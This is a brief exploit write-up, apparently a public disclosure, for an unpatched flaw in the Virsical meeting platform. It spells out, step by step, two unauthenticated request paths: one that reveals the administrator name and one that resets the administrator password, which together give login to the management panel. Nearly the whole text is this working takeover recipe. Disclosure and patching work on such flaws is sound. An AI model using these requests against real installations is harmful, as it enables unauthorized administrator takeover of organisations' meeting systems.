virsical meeting platform 0day exploit

bug description

two unauthorized interface combined exploit , leads to administrator account takeover

exploit detail

1. use unauthorized interface 1: /smartmeeting/smart/third/deleteRoom?roomId=618 to get administrator name

2. use unauthorized interface 2: /iwork/userInfo/updatePwd?userId=sysadmin&pwd=xxxxxx to update administrator's password(new pwd is base64 encoded)

3. successfully login to meeting manage panel with new password